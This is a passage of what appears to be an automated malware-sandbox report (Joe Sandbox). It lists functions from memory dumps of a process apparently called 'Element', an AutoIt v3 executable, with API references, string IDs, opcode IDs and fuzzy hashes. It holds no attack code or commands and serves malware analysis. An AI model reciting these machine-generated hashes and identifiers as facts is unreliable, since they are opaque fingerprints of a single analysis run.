                    • Instruction Fuzzy Hash: C9418C326186D187E764CF22A854B6BBBA4F788B92F144135EFCA87B55DF3CD8448B00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: f$p$p
                    • API String ID: 3215553584-1995029353
                    • Opcode ID: 9fe477bd0c5a7b01680382f126af39dde9fe20cbd0db8a811c9d028545c0385f
                    • Instruction ID: 35bd8e3e524bc7eab3183231a4608edd526755d58674c1caa61aac8bc068cca8
                    • Opcode Fuzzy Hash: 9fe477bd0c5a7b01680382f126af39dde9fe20cbd0db8a811c9d028545c0385f
                    • Instruction Fuzzy Hash: A712C372609281A6FB24BB14E07D7FA76A2F3B0754F984016EE92476C4D778CCCACB14
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                    • Instruction ID: 9f096b830bd5be7f4fd60be1dbe9f46f41fb953d8ed8b16b5b5feffed7adea8e
                    • Opcode Fuzzy Hash: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                    • Instruction Fuzzy Hash: 45C1F662A0E6A2C5EA64AF159C5027E6B99FB80F82F550135DACE873D6CF3DEC418704
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: 94e99afacb6616a9b46cb6a5db9c8b19b6303e58a3e745d9002a33f1b15372e6
                    • Instruction ID: 553735a7b15417a65e72f255ae60dad6f5a6e0c60a9143f68fb5d56983928230
                    • Opcode Fuzzy Hash: 94e99afacb6616a9b46cb6a5db9c8b19b6303e58a3e745d9002a33f1b15372e6
                    • Instruction Fuzzy Hash: 9FC1D2B2204785A2FB619BA5D4783EE3BE0F7A1B90F550115EE8A03791DB78C8CBC740
                    APIs
                    • #77.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF6C58F0CA8,?,?,00000000,00007FF6C59086CF), ref: 00007FF6C58F133B
                    • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF6C58F0CA8,?,?,00000000,00007FF6C59086CF), ref: 00007FF6C58F1391
                    • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF6C58F0CA8,?,?,00000000,00007FF6C59086CF), ref: 00007FF6C58F1478
                    • #24.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF6C58F0CA8,?,?,00000000,00007FF6C59086CF), ref: 00007FF6C58F149F
                    • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF6C58F0CA8,?,?,00000000,00007FF6C59086CF), ref: 00007FF6C58F14B0
                    • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF6C58F0CA8,?,?,00000000,00007FF6C59086CF), ref: 00007FF6C58F151E
                    • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF6C58F0CA8,?,?,00000000,00007FF6C59086CF), ref: 00007FF6C58F1593
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
                    • Instruction ID: 67143af04e1a1d1edabeec21af45ace7104ddb9b67a45bade2f3b76062361656
                    • Opcode Fuzzy Hash: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
                    • Instruction Fuzzy Hash: 07A1BD22E0A66285FB149F65C8443BC27A2FB98F96F554231DE8ED7696DF3CE841C340
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: d06d4cd1a423281fa7bfc3dd395589592d26c066c60ef58400709c52517d685a
                    • Instruction ID: 9ff4503b1278fc61e0ed7e30108655bca56cab57717856537b4611ca37c08f82
                    • Opcode Fuzzy Hash: d06d4cd1a423281fa7bfc3dd395589592d26c066c60ef58400709c52517d685a
                    • Instruction Fuzzy Hash: AFA19E72B186D087D7748F1AA80066EBB65FB85BD5F144125EACA57B69CF3CD842CF00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Enabled
                    • String ID:
                    • API String ID: 3694350264-0
                    • Opcode ID: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                    • Instruction ID: 3e6ca779b60336dedfb8f9f212b661f5ca22fe89c7bcb8a6bd52bf7bbf6823b3
                    • Opcode Fuzzy Hash: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                    • Instruction Fuzzy Hash: E591AD61E0968686FBA49F169C587B97791AF44F92F4440B6CADD83693DF3CEC808340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID: {for
                    • API String ID: 2943138195-864106941
                    • Opcode ID: a5fdb8b41746570ddb4a6c35813bd7a5a02f78c60ac1663242e01e009bc5989a
                    • Instruction ID: 097e67e469843788b52ec368620180bcf571d64a258c00e01621d1ad29a47548
                    • Opcode Fuzzy Hash: a5fdb8b41746570ddb4a6c35813bd7a5a02f78c60ac1663242e01e009bc5989a
                    • Instruction Fuzzy Hash: F1518A72600B84B9FB01DF64D4B83EC37A4E364788F848511DE4857B99DB78CADAC740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                    • String ID:
                    • API String ID: 161812096-0
                    • Opcode ID: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
                    • Instruction ID: c71a5099d2d08c490d836aa91b34841b56cf457b03b5e54114b11c19572d3b4c
                    • Opcode Fuzzy Hash: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
                    • Instruction Fuzzy Hash: D1418A36A04B9185EB50CF22D8846AD33A6FB95F96F140072DE8D87766CF38E848C700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+Replicator::operator[]
                    • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                    • API String ID: 1405650943-2211150622
                    • Opcode ID: 8624ffa6286a329bd631787d57d7c436c78feb80bbbfb7c630a3299e2e9fd710
                    • Instruction ID: 55b3af2c6fa1a9d812a1f98dd44bcbc3815c85085a282997977a9075f86f805a
                    • Opcode Fuzzy Hash: 8624ffa6286a329bd631787d57d7c436c78feb80bbbfb7c630a3299e2e9fd710
                    • Instruction Fuzzy Hash: 12413D72A00B44B8F711AB68D8B83ED37E4B328308F588515CE4857768DF7886C6CB51
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID: char $int $long $short $unsigned
                    • API String ID: 2943138195-3894466517
                    • Opcode ID: 5c74198424c0575449acf1c04fcf47b84933b6485333105e5f7cacb712aad59b
                    • Instruction ID: ccfb9620116ae19919eea91da3c4d2deb595055cf32e3bbba98e20279254b254
                    • Opcode Fuzzy Hash: 5c74198424c0575449acf1c04fcf47b84933b6485333105e5f7cacb712aad59b
                    • Instruction Fuzzy Hash: 60317E72A10A50B8F716EF78D8783DC37B1B328788F448115EE0947BA8DB38D586CB51
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
                    • Instruction ID: 9a474fce85034183310e994f646238662d678dea0c773ae47d0a84360f9b749a
                    • Opcode Fuzzy Hash: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
                    • Instruction Fuzzy Hash: C9313936A0869187E3708F25F894B1AB761EB88B91F109279DB9943F5ACF3CD8458B40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                    • String ID: CONOUT$
                    • API String ID: 3230265001-3130406586
                    • Opcode ID: de701a4396c4e153d23f8ad3f37449c6d9e79256a48d94d605cba933e1fcaf7d
                    • Instruction ID: 02ba62a5c220de072ad1958942caf09bdff209e5f41fdac6e78299e83b0cff31
                    • Opcode Fuzzy Hash: de701a4396c4e153d23f8ad3f37449c6d9e79256a48d94d605cba933e1fcaf7d
                    • Instruction Fuzzy Hash: 92118231714B8096F7509B62F8783DAA2A4F7A8FE5F444224EE5E87794DF38C4968740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$Create$Show
                    • String ID: AutoIt v3$d$edit
                    • API String ID: 2813641753-2600919596
                    • Opcode ID: 0ad88fc629bd0e984a014ea89d123ec5e352ad141f26ec72c70a003d1c95128a
                    • Instruction ID: e2f017c30877d6f91507745af31dc02d46a31f1f0707ac8c66822f32850df67e
                    • Opcode Fuzzy Hash: 0ad88fc629bd0e984a014ea89d123ec5e352ad141f26ec72c70a003d1c95128a
                    • Instruction Fuzzy Hash: E6212E72A18B8187E750CF14FC8872977A0F788B9AF504239E68D86A56DFBDD548CB40
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 97d8d3606c8b00985874530aa69a2e9c40f0350da9554f7eae706c9fcadbbb71
                    • Instruction ID: e1345bf813b5a51485f89ab0e2b23afe40da3bc07308bd978122d2cc2c831d8e
                    • Opcode Fuzzy Hash: 97d8d3606c8b00985874530aa69a2e9c40f0350da9554f7eae706c9fcadbbb71
                    • Instruction Fuzzy Hash: E9D1ED32619AC596EA60CB15F4A43EAB7E1F7D8784F504535EB8D83B99EE3DC580CB00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Rect$Client$Window$MetricsScreenSystem
                    • String ID:
                    • API String ID: 3220332590-0
                    • Opcode ID: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
                    • Instruction ID: 019499fd769e2e8c71e2580a734d6e078cb896148ace056a3fca3a22dda9221a
                    • Opcode Fuzzy Hash: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
                    • Instruction Fuzzy Hash: 9DA1D26BA1A2A385E7249F7588047BD33A0FF04F59F145535EE9A8BA94EF3CAC05D310
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: f$p
                    • API String ID: 3215553584-1290815066
                    • Opcode ID: 14ccad43d37fd71aaa8e031f26cd0cf571f1f2d22f7e2fca84e2043b4fd9c4d9
                    • Instruction ID: f0ed0b85d1bca78db11650b41bb97537752c659413e664b6e7aef72b9b2ae17b
                    • Opcode Fuzzy Hash: 14ccad43d37fd71aaa8e031f26cd0cf571f1f2d22f7e2fca84e2043b4fd9c4d9
                    • Instruction Fuzzy Hash: E312C762E0E26386FB20BE54E804279B652FB50F56FD44231D6D987AC8DF3DED809B10
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ByteCharMultiStringWide
                    • String ID:
                    • API String ID: 2829165498-0
                    • Opcode ID: 135b7faccc249d12f88eb3664e1253755368c54c6aec1dafbdc752c20442abd4
                    • Instruction ID: 1b2f41ada88199bfb5ad4e545bb7a388cc4cdb58343f0d5887187d7f25c8a6cf
                    • Opcode Fuzzy Hash: 135b7faccc249d12f88eb3664e1253755368c54c6aec1dafbdc752c20442abd4
                    • Instruction Fuzzy Hash: 4E817B7260178096FB20EF25E4687D9A3A5FBA4BE8F144715EE5987BD8EB38C485C700
                    APIs
                    • #8.OLEAUT32(?,?,?,?,?,?,?,00007FF6C58DB677,?,?,?,?,?,?,00000000,00007FF6C59083FD), ref: 00007FF6C58DB329
                    • #9.WSOCK32(?,?,?,?,?,?,?,00007FF6C58DB677,?,?,?,?,?,?,00000000,00007FF6C59083FD), ref: 00007FF6C58DB3AE
                    • #10.WSOCK32(?,?,?,?,?,?,?,00007FF6C58DB677,?,?,?,?,?,?,00000000,00007FF6C59083FD), ref: 00007FF6C58DB3BA
                    • #9.WSOCK32(?,?,?,?,?,?,?,00007FF6C58DB677,?,?,?,?,?,?,00000000,00007FF6C59083FD), ref: 00007FF6C58DB3C5
                    • #2.WSOCK32(?,?,?,?,?,?,?,00007FF6C58DB677,?,?,?,?,?,?,00000000,00007FF6C59083FD), ref: 00007FF6C58DB3F5
                    • #10.WSOCK32(?,?,?,?,?,?,?,00007FF6C58DB677,?,?,?,?,?,?,00000000,00007FF6C59083FD), ref: 00007FF6C58DB457
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 785b3640f85267f1ef9f05d197945c1451001bbbcd8b86362fb934929ab386fd
                    • Instruction ID: 8ecae36bcecf7f773d8a8f10b31266e4ee799b79363577fd9402e47fb4475505
                    • Opcode Fuzzy Hash: 785b3640f85267f1ef9f05d197945c1451001bbbcd8b86362fb934929ab386fd
                    • Instruction Fuzzy Hash: 6E712D31A1A66382EA28AF25999407C63E1EF45FC3F048137D78E8B795DF2DED518B01
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+$NameName::
                    • String ID:
                    • API String ID: 168861036-0
                    • Opcode ID: 96d98e723097de02a272e54d55b86372c1517beb461cdde51446e9f1e1fea1b6
                    • Instruction ID: a8516e61bbbac749a95356528e696055cf346cf271684e12d9c6d19db4d6639e
                    • Opcode Fuzzy Hash: 96d98e723097de02a272e54d55b86372c1517beb461cdde51446e9f1e1fea1b6
                    • Instruction Fuzzy Hash: 55718872A00B50B9F701EFA4E8B83ED37B5B364794F688016EE0957796DB79C582CB40
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 0-2263619337
                    • Opcode ID: 10a07b77c3d4b654f9d55339737c030c9922b14c4774005ba61325eac3fbb13f
                    • Instruction ID: bbb4c1d877cc4953e20a92acdd27dbad3d36540085154b3fc8903ae1472f22fc
                    • Opcode Fuzzy Hash: 10a07b77c3d4b654f9d55339737c030c9922b14c4774005ba61325eac3fbb13f
                    • Instruction Fuzzy Hash: 34519022F0AA6286EB10DF65D9441BC3365EB84F89F548132DA8D877A5DF3DED01C340
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                    • String ID:
                    • API String ID: 2592858361-0
                    • Opcode ID: c0ed2a69acb1fa65bc09f52d169f3783c288c6979980f6a8e8ea6be4c03c785a
                    • Instruction ID: 68cd6ea29989bd81c1ad0732e472fa244987ee33f15602a98e683a41d2265f36
                    • Opcode Fuzzy Hash: c0ed2a69acb1fa65bc09f52d169f3783c288c6979980f6a8e8ea6be4c03c785a
                    • Instruction Fuzzy Hash: 35518B72B097A286E620CF11D88477937A4FB85F96F104235DA9D87BA2CF7CE805C700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                    • String ID:
                    • API String ID: 2081738530-0
                    • Opcode ID: e90e3d566dd56e350ca621f805dc626bd08b9bda4c91665b6419e05b97e73a74
                    • Instruction ID: 8f6b29949baab62e02bc1f4bab33821c73952e0000220f080e71b3d7021f2347
                    • Opcode Fuzzy Hash: e90e3d566dd56e350ca621f805dc626bd08b9bda4c91665b6419e05b97e73a74
                    • Instruction Fuzzy Hash: 3F319336A01A40A5FA15EF65E4F83D97765E7B5BA0F180322DE0987799EB78C9C2C310
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                    • String ID:
                    • API String ID: 2081738530-0
                    • Opcode ID: e14cd25dbeedfe3e74d2bb755ee8c59526504ae7ba32fe4ee3ab8448ffde2d5f
